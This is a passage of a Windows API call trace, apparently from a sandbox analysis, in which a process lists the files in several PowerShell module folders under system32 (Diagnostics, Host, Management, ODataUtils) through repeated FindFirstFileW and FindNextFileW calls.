dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0226.300] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.300] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.300] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.301] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.301] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0226.301] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 0 [0226.302] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.302] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.303] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.303] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0226.304] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 0 [0226.304] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.304] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.305] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.305] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0226.305] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.306] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.306] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.306] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.307] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0226.307] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 0 [0226.307] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.308] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.308] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.309] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0226.309] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0226.309] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.310] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.310] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.310] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0226.311] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.311] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.311] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0226.311] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.312] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.312] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0226.313] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0226.313] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.313] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0226.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.313] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0226.314] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53 [0226.314] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.314] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.314] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.314] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0226.315] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0226.315] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0226.315] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0226.315] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0226.315] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 0 [0226.315] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.316] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0226.316] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53 [0226.316] 